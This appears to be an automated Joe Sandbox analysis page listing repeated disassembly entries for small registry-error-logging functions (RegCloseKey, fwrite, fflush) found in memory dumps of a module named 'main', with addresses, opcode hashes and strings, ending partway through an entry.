Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 300d62241b88fd89afd79c4ffcb8bf13f2729a93e3e46433130e31516d88ba23
Instruction ID: 4cb6875edd502ad02ea69aa5f4794496563893d4cc6f6ae655003d8eac2e2fc3
Opcode Fuzzy Hash: 300d62241b88fd89afd79c4ffcb8bf13f2729a93e3e46433130e31516d88ba23
Instruction Fuzzy Hash: 98F09662A08706C6F553BF00B880379A258EF417E4FE841BAED5DC6691DF3CDD8A9310

Function 00007FF76A9058BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF76A9058CD

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF76A90591D
registry_get_value, xrefs: 00007FF76A905916

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 8385190164f1da499e7db657225c7121ac9db16c220cfac62d52dec20463a6a4
Instruction ID: e86d19ae0ce051b1523f0b052974854f163b0bc9c0c5c35f4f4283db4b4c248a
Opcode Fuzzy Hash: 8385190164f1da499e7db657225c7121ac9db16c220cfac62d52dec20463a6a4
Instruction Fuzzy Hash: 7AF09662A08706C6F552BF00B880379E258EF417E4FE841BAED5DC6691DF3CDD8A9710

Function 00007FF76A905827 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF76A9058CD

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF76A90591D
registry_get_value, xrefs: 00007FF76A905916

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 98a79bf53b9707b0b89be560322f635c82033732c815f294ff832b0e45eb712a
Instruction ID: 1736b91c9fda1adc6649b108118be2b4224fcfbbe8036aac91372644fb090cdd
Opcode Fuzzy Hash: 98a79bf53b9707b0b89be560322f635c82033732c815f294ff832b0e45eb712a
Instruction Fuzzy Hash: F5F09662A08706C6F552BF00B880379A258FF417E4FE841B9ED5DC6691DF3CDD8A9310

Function 00007FF76A90581D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF76A9058CD

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF76A90591D
registry_get_value, xrefs: 00007FF76A905916

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 990066756728bfaa2a4d81c8a44eef0bc49c61021d5e2e0a54b85f4f9143ce46
Instruction ID: d585aa66325d211be435652501a499b2687bbede1bd9f1a0d51ab6c5850f3655
Opcode Fuzzy Hash: 990066756728bfaa2a4d81c8a44eef0bc49c61021d5e2e0a54b85f4f9143ce46
Instruction Fuzzy Hash: F0F09662A0870AC6F552BF00B880379A258EF417E4FE842B9ED5DC6691DF3CDD8A9310

Function 00007FF76A905938 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF76A9058CD

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF76A90591D
registry_get_value, xrefs: 00007FF76A905916

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 0e5e66ba41c2d573627e4d7c1ca3e77aab570a109e1527f858700240d134f2da
Instruction ID: 650832368ea00903c70b85a936cda5ec681e1fb0ab3b105feeab0762441e1fc7
Opcode Fuzzy Hash: 0e5e66ba41c2d573627e4d7c1ca3e77aab570a109e1527f858700240d134f2da
Instruction Fuzzy Hash: BEF09662608706C6F552BF00B880379A258FF407E4FE842B9ED5DC6691DF3CDD8A9310

Function 00007FFE115089AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115089CD

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11508A1D
registry_get_value, xrefs: 00007FFE11508A16

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: cdeb8c0778d5ec95aabbdf7d84f7f7528421194025ea21ed43b05ade15f21e50
Instruction ID: eb1ac96e288f2e024fc6fa57b534aa743bb6e4a22bf7e0c3025331d8dbe38b1d
Opcode Fuzzy Hash: cdeb8c0778d5ec95aabbdf7d84f7f7528421194025ea21ed43b05ade15f21e50
Instruction Fuzzy Hash: ECF096A2A08E0642E7529F46BC407B9735DAF447B4F4802BEDD4D466B0EF7DE9899301

Function 00007FFE115089BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115089CD

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11508A1D
registry_get_value, xrefs: 00007FFE11508A16

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: d89acbca4b734f0ef0a111dd1744566fa57b977269447716bdb86814b99b9422
Instruction ID: c915f54032f6c22d490d241cd0dac2567d151edfaec738859f7c9433c101049a
Opcode Fuzzy Hash: d89acbca4b734f0ef0a111dd1744566fa57b977269447716bdb86814b99b9422
Instruction Fuzzy Hash: 14F096A2A08E0642E7529F46B8407B9735DAF447B4F4802BEDD4D466B0EF7DE9899700

Function 00007FFE11508A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115089CD

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11508A1D
registry_get_value, xrefs: 00007FFE11508A16

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: cd0a951e1bf2ea82e0d4821eb3c00294b76a8aad4edfcec30ea840013d375618
Instruction ID: 5a28aa5eda4fb45d67131a013ecfdc7ca0f4f71f496bacd23eafa70215d38f12
Opcode Fuzzy Hash: cd0a951e1bf2ea82e0d4821eb3c00294b76a8aad4edfcec30ea840013d375618
Instruction Fuzzy Hash: DDF096A2A08F0642E7529F46B8407B9735DAF447B4F4842BEDD4D466B0EF7DD9899300

Function 00007FFE11508927 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115089CD

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11508A1D
registry_get_value, xrefs: 00007FFE11508A16

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 84b590a193693856d743421fcd3b4043906201f3b1909d5d21fd49a0aad7dcf4
Instruction ID: b22710df715a9e504f4cf49a658bb59fb4fdb4cc883314ca0f5593862a13d447
Opcode Fuzzy Hash: 84b590a193693856d743421fcd3b4043906201f3b1909d5d21fd49a0aad7dcf4
Instruction Fuzzy Hash: 4BF090A2A08E0682E7529F46BC407B9735DAF447B4F4802BEDD4D466B0EF7DE9899300

Function 00007FFE1150891D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115089CD

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11508A1D
registry_get_value, xrefs: 00007FFE11508A16

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: e06eedbcc9ea280e2f8d24d9438890717edad6e02bdf5d05beeeb429cdf2e1f3
Instruction ID: 72c5f16831f6e1d821f8c1501b7a24c728747579ac934b683467533af34264ac
Opcode Fuzzy Hash: e06eedbcc9ea280e2f8d24d9438890717edad6e02bdf5d05beeeb429cdf2e1f3
Instruction Fuzzy Hash: 67F096A2A08F0642E7529F46B8407B9735DAF447B5F4802BEDD4D466B0EF7DE9899300

Function 00007FFE0EB4271E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4273D

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

registry_get_value, xrefs: 00007FFE0EB42786
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4278D

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 3895ea5ccc1a9c0ba70ec562e9d7737373ffcc11e245141d9ecc3ceb47b072fc
Instruction ID: 4d6367f23d750e54cbf7b5c6bdcdb0ffc3a1cb4afdfdd422114128118ddbd8ab
Opcode Fuzzy Hash: 3895ea5ccc1a9c0ba70ec562e9d7737373ffcc11e245141d9ecc3ceb47b072fc
Instruction Fuzzy Hash: 18F09662B0874642E5628F04BC403797354FF44794F480136ED8D466B4DF3DDA85AB01

Function 00007FFE0EB4272C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4273D

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

registry_get_value, xrefs: 00007FFE0EB42786
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4278D

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 0ae7c48307a6deb01bbf84268c238f770e68e431e8e92444f6d98cededd14a4a
Instruction ID: 044903b2d2cece02747f7833f4b3a9fc6c983225c2cdb15cae34df008f4bcfe5
Opcode Fuzzy Hash: 0ae7c48307a6deb01bbf84268c238f770e68e431e8e92444f6d98cededd14a4a
Instruction Fuzzy Hash: 1EF09662B0874642E5628F44B8403797354FF44794F480136ED8D866B4DF3DDA85AB01

Function 00007FFE0EB4268D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4273D

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

registry_get_value, xrefs: 00007FFE0EB42786
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4278D

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: a946e6fb01939640250fe4d87fd1727f894f0189a636eb6478591194451f6b32
Instruction ID: d59f4d71303ca7646aa86d195382bfca98fa3ad25ee7ada5f5e0739565312152
Opcode Fuzzy Hash: a946e6fb01939640250fe4d87fd1727f894f0189a636eb6478591194451f6b32
Instruction Fuzzy Hash: 75F09662B0874A42E5628F04B8403797354FF44795F480235ED8D466B4EF3DDA85AB01

Function 00007FFE0EB42697 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4273D

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

registry_get_value, xrefs: 00007FFE0EB42786
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4278D

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: cb64d1539feb0c34fc73d2a78e2a49e7fe7a9be699fe1023e1cdf2c904b94b15
Instruction ID: ae9e141f36b9c0831bb92af63c44a5fb23f5088fc813885a4ceccdc45f64d937
Opcode Fuzzy Hash: cb64d1539feb0c34fc73d2a78e2a49e7fe7a9be699fe1023e1cdf2c904b94b15
Instruction Fuzzy Hash: 58F09662B0874642E5728F04BC403797354FF44794F480135ED8D466B4DF3DDA89AB00

Function 00007FFE0EB427A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4273D

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

registry_get_value, xrefs: 00007FFE0EB42786
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4278D

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: cda576ce803dd63f734d1a0fb6bc0958773d9d3f96f8f8fa6c15edd8b57912cf
Instruction ID: 06a69a677d2a1ee8c3e1a6ba24ff54d960bcd23942e6877465c3697182eeed66
Opcode Fuzzy Hash: cda576ce803dd63f734d1a0fb6bc0958773d9d3f96f8f8fa6c15edd8b57912cf
Instruction Fuzzy Hash: 20F09662B0874642E6628F04B8403797354FF44794F484235EDCD466B4DF3DDA89AB01

Function 00007FFE0E16B2FD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16B3AD

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E16B3FD
registry_get_value, xrefs: 00007FFE0E16B3F6

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 1726078345292218ae6fca3387da9e0b278bbc608f39be5f3a5ef1151e4d23a0
